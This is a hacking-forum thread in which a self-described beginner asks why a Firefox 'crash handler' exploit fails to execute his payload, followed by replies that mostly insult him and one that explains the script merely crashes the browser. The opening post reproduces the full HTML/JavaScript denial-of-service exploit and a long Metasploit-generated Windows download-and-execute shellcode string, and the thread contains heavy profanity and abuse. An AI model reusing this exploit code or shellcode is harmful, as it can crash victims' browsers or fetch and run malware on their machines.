| Author |
remote execution not working? |
dryheat360
Member
Posts: 3
Location:
Joined: 10.04.11
Rank: Newbie |
|
Hey guys. I've been browsing the site from time to time and I finally decided to join. I am really trying hard to escape the "skiddy" phase and actually do some real learning, and what better way to learn then through trial and error right? Some other sites (which wont be named) pride themselves on the "Download Keyloggers" section, but dont have anything to actually learn from. Anyway, enough about that, onto the question:
So I've been messing some code here that is supposed to allow remote execution of code through firefox based on what im told. The code effectively crashes my firefox when I dont have my custom payload, but when I try to put my own thing inside, it still crashes and does not execute. I have just recently started playing with exploits so I am not too familiar with what im doing. Basically here is whats going on:
Got an exploit from injector. I was told this allows remote execution of code:
#==
# Title : Mozilla Firefox (all) Crash Handler Vulnerabilities
# Author : KedAns-Dz
# E-mail : [email="ked-h@hotmail.com"]ked-h@hotmail.com[/email]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter : [url="http://twitter.com/kedans"]twitter.com/kedans[/url]
# platform : windows
# Impact : Crash Handler
# Tested on : Windows XP Sp3 FR & Linux Ubuntu 8.10 En ( Back-Track 4 'R1')
# Target : Mozilla Firefox (all)
# ** this Vulnerabilities is expectant in all Versions 2 etc ... 3.x **
#==
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# == HTML (1) ==>
<html>
<head>
<body onblockedload="javascblockedript:KeD();">
<scblockedript language="Javascblockedript">
function KeD()
{
var buffer = '\x42';
for(i=0; i <= 999 ; ++i)
buffer+=buffer+
window.open(buffer+buffer+buffer,width=-99,height=-99); // Open New Windows & Crash !!
}
</scblockedript>
</head>
</body>
</html>
# == HTML (2) ==>
<html>
<head>
<body onblockedload="javascblockedript:AnS();">
<scblockedript language="Javascblockedript">
function AnS()
{
var buffer = '\x42';
for(i=0; i <= 999 ; ++i)
buffer+=buffer+
window.open(buffer+buffer+buffer,fullscreen=true); // Open New Windows & Crash !!
}
</scblockedript>
</head>
</body>
</html>
#==[ Exploited By KedAns-Dz * HaCerS-StreeT-Team-Dz * ]==
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu ([url="http://www.1923turk.com"]www.1923turk.com[/url])
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [url="http://www.packetstormsecurity.org"]www.packetstormsecurity.org[/url] * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# [url="http://www.metasploit.com"]www.metasploit.com[/url] * [url="http://www.securityreason.com"]www.securityreason.com[/url] * All Security and Exploits Webs ...
#==
# 1337day.com [2011-03-27]
First of all, do I choose either section of html, or do I use them both? I have tried many things to no avail. Anyways, where it says '\x42' I put my own payload that was generated through MetaSploit. It looks like this:
"\xb8\xfa\x70\x18\xa2\xda\xcd\xd9\x74\x24"+
"\xf4\x5e\x31\xc9\xb1\x60\x83\xee\xfc\x31"+
"\x46\x0f\x03\x46\xf5\x92\xed\x49\x19\x09"+
"\x44\xbd\xd0\xcb\xe1\xfd\xe3\x93\x26\xf4"+
"\x7a\x71\xbc\xe3\x79\x9e\xaa\x0b\x7e\xa1"+
"\x5d\xb8\x19\xc7\x07\x83\xe4\xc0\x9e\x9d"+
"\x8f\xa8\xf3\x44\x3a\xd8\x1a\xf3\x70\xcf"+
"\x05\x6d\x6a\xae\xa7\x64\x2f\x22\x25\xff"+
"\xce\xd9\xdf\x12\xf7\x67\x85\x71\xe5\x40"+
"\x37\xdf\x7d\xa0\x86\xe8\x6f\x98\x8d\x8b"+
"\x9d\x8f\x42\xdc\x61\x25\x9a\x0e\xf0\x7a"+
"\x22\xca\xac\xe7\x77\x90\x20\xd8\x4e\xa0"+
"\xd2\x8c\x5c\xf0\x6f\xb6\x3b\x46\xf7\x5d"+
"\xe3\xfc\x57\x9d\x06\x90\x45\xbe\xa2\x08"+
"\x33\x18\xd5\xb7\x59\xc0\x37\x51\xc7\xab"+
"\x25\x02\xe5\x25\x50\x9b\x9e\xa8\x2d\xd0"+
"\x3d\x0c\xdc\xdf\xa4\x14\x86\xfa\x89\xb2"+
"\x72\x35\x53\x75\xe1\x09\x89\xc8\x19\x15"+
"\x6d\xbb\x79\xbf\xf4\xa5\x98\x9f\x8c\x19"+
"\x43\x06\x37\xbc\x90\x5a\x2e\x10\x71\x5a"+
"\x4a\x1b\x3b\x76\x2f\x10\x82\xbd\xc9\x18"+
"\x80\x1f\x88\x3f\xae\x58\x05\xc3\x6f\x44"+
"\xf3\xa1\x71\x8a\x9a\x43\xdb\x2a\x55\xba"+
"\xd6\x02\xac\x5b\x29\xf9\x3c\xe1\x7c\xc8"+
"\x26\x27\x17\x04\xc0\x79\x85\x3c\x55\xb3"+
"\x4a\x18\x89\xdb\xba\x51\x9e\xd6\x5d\x2d"+
"\xe3\x27\x93\xca\x94\x0d\x8d\x76\x2b\xed"+
"\x48\xe1\xad\xcf\x69\x00\xf8\x1b\x67\x21"+
"\x22\x26\x75\x3d\x2e\x33\x6c\x5b\x10\x38"+
"\x9c\x96\x4c\x2b\xb2\xdb\x78\x71\xbd\xcf"+
"\x7c\x70\xd3\xe6\x97\x65\xf4\x9e\xa9\x96"+
"\xf2\x7d\xd4\xab\x07\xe4\xca\xb5\x08\xfa"+
"\x3f\xc4\x02\xf9\x47\xda\x4c\xd7\x41\xdd"+
"\x92\x0d\x5d\xe5\x86\x56\x76\xfa\x81\x3e"+
"\x64\x10\xc4\xb5\x82\x10\xbe\xfa\xa1\x0a"+
"\x1c\xf4\xdb\x42\x6a\x0f\xdb\x50\x58\x06"+
"\xc4\x5b\x96\x1b\x22\x02\x31\x90\xa6\x45"+
"\xe7\x6b\x07\x83\xd5\xcd\xa2\xf9\x5f\xa5"+
"\xdb\x8a\x71\x3f\x4a\x11\xfa\xd0\xe1\xa9"+
"\x31\x5c\xd7\x2a\x59\xcf\x02\x9f\xe3\x7c"+
"\x2d\xb9\x8e\xac\xc8\x3d\x34\x31"
and of course this is ruby. This is a Windows payload download_exec. My problem here is that it doesnt run.. I have tried making a message box pop up also without success.
I also found another exploit that specifically claims remote execution at:
http://www.1337day.com/exploits/14208
but I have no idea what to do with it. Where does the payload go?
I know im missing something here, but what? Any help is appreciated :D |
|
| Author |
RE: remote execution not working? |
xof
Member
Posts: 17
Location:
Joined: 27.02.10
Rank: Wiseman |
|
|
Go learn how to fucking program. |
|
|
| Author |
RE: remote execution not working? |
dryheat360
Member
Posts: 3
Location:
Joined: 10.04.11
Rank: Newbie |
|
|
xof wrote:
Go learn how to fucking program.
Another 16 year old acting hard with his keyboard. Your cool, bro.
Go Fuck yourself.
Anyone have anything constructive to say? |
|
|
| Author |
RE: remote execution not working? |
stealth-
Member
Posts: 999
Location: Eh?
Joined: 10.04.09
Rank: God |
|
dryheat360 wrote:
xof wrote:
Go learn how to fucking program.
Another 16 year old acting hard with his keyboard. Your cool, bro.
Go Fuck yourself.
Anyone have anything constructive to say?
No, he is serious. Just blunt. Allow me to elaborate:
You clearly do not have any understanding of how those exploits work. Not that it is a bad thing, but it just means that you aren't going to learn much from them this way. If you would really like to leave the scblockedript kiddie phase, then just randomly trying to run exploits is not the way to do it. You should have the programming knowledge of how these work before you go playing with them, otherwise they aren't going to be of any benefit to you knowledge-wise. We could spoon-feed you here and explain why what you're trying to do isn't what you think it is, but you wouldn't learn much. Honestly, programming knowledge is a must before you play with these.
Hope that clarifies.
The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealth-x.com |
|
| Author |
RE: remote execution not working? |
dryheat360
Member
Posts: 3
Location:
Joined: 10.04.11
Rank: Newbie |
|
What your saying totally makes sense. What I'm not 100% sure of is why this particular exoit didn't work. I mean the code seems simple enough right?
I am in fact learning programming at the moment. In fact besides what I've learned and continue to learn on my own, I've signed up for classes. My train of though here though was something along the lines of "what better way to learn than through trial and error right?"
Thanks for the response by the way. |
|
|
| Author |
RE: remote execution not working? |
xof
Member
Posts: 17
Location:
Joined: 27.02.10
Rank: Wiseman |
|
Why don't you just look at the code.
All it's doing is looping through 999 times and appending your 'payload' to the variable buffer each time. On each loop it will also open a window with an address of 'bufferbufferbuffer'. That's a really long address and pretty obvious to as why it's causing your browser to crash. How stupid are you? It says "Mozilla Firefox (all) Crash Handler Vulnerabilities" in the title of your exploit. It's supposed to crash.
You want to learn how to hax0r? Read up on assembly, how programming languages handle memory, compilers, and also some architecture stuff wouldn't be bad either.
Until then you can go fuck yourself you piece of shit skid. Kay bro? |
|
|
| Author |
RE: remote execution not working? |
suid
Member
Posts: 19
Location: /
Joined: 12.11.10
Rank: HBH Guru |
|
|
xof wrote:
All it's doing is looping through 999 times
That loop iterates 1000 times. Misreading numbers of iterations can lead to some nasty consequences.
I realize this is totally off-topic.
Edited by suid on 11-04-11 15:36 |
|
|
| Author |
RE: remote execution not working? |
spyware
Member
Posts: 4190
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 90
|
|
Not sure why people veered away from the whole bluntness thing.
Fuck off, OP.
"The chowner of property." - Zeph Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
|
| Author |
RE: remote execution not working? |
Arabian
Member
Posts: 322
Location: inside you.
Joined: 22.09.10
Rank: God |
|
When I read this code, my brain is full of fuck.
Hare Lambda!
|
|
|
| Author |
RE: remote execution not working? |
korg
Admin from hell
Posts: 1704
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank: The Master |
|
That's about enough, i think the OP gets the idea now.
I deal in pain, All life I drain, I dominate, I seal your fate.
|
|
|
Main:
